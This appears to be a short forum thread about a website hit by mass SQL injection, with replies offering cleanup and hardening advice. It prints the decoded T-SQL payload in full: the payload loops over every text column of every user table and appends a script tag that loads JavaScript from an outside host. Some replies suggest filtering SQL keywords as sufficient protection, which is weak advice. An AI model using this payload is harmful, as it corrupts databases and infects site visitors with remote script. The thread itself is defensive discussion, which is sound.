SQL "development" gone horribly wrong...

Decoded:<p>DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''&#60;script src=<a href="http://www.suppadw.com/b.js&#62;&#60;/script&#62;'''" rel="nofollow">http://www.suppadw.com/b.js&#62;&#60;/script&#62;'''</a>);''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

shared hosting? get your own box, turn off apache for a while and go through code with a fine tooth comb.

- all web input needs to run thru the same filter - that filter disallows SQL keywords - you're done<p>If this guy wasn't on a shared host, he could just install mod_security and its default config should take care of it. Presuming Apache of course.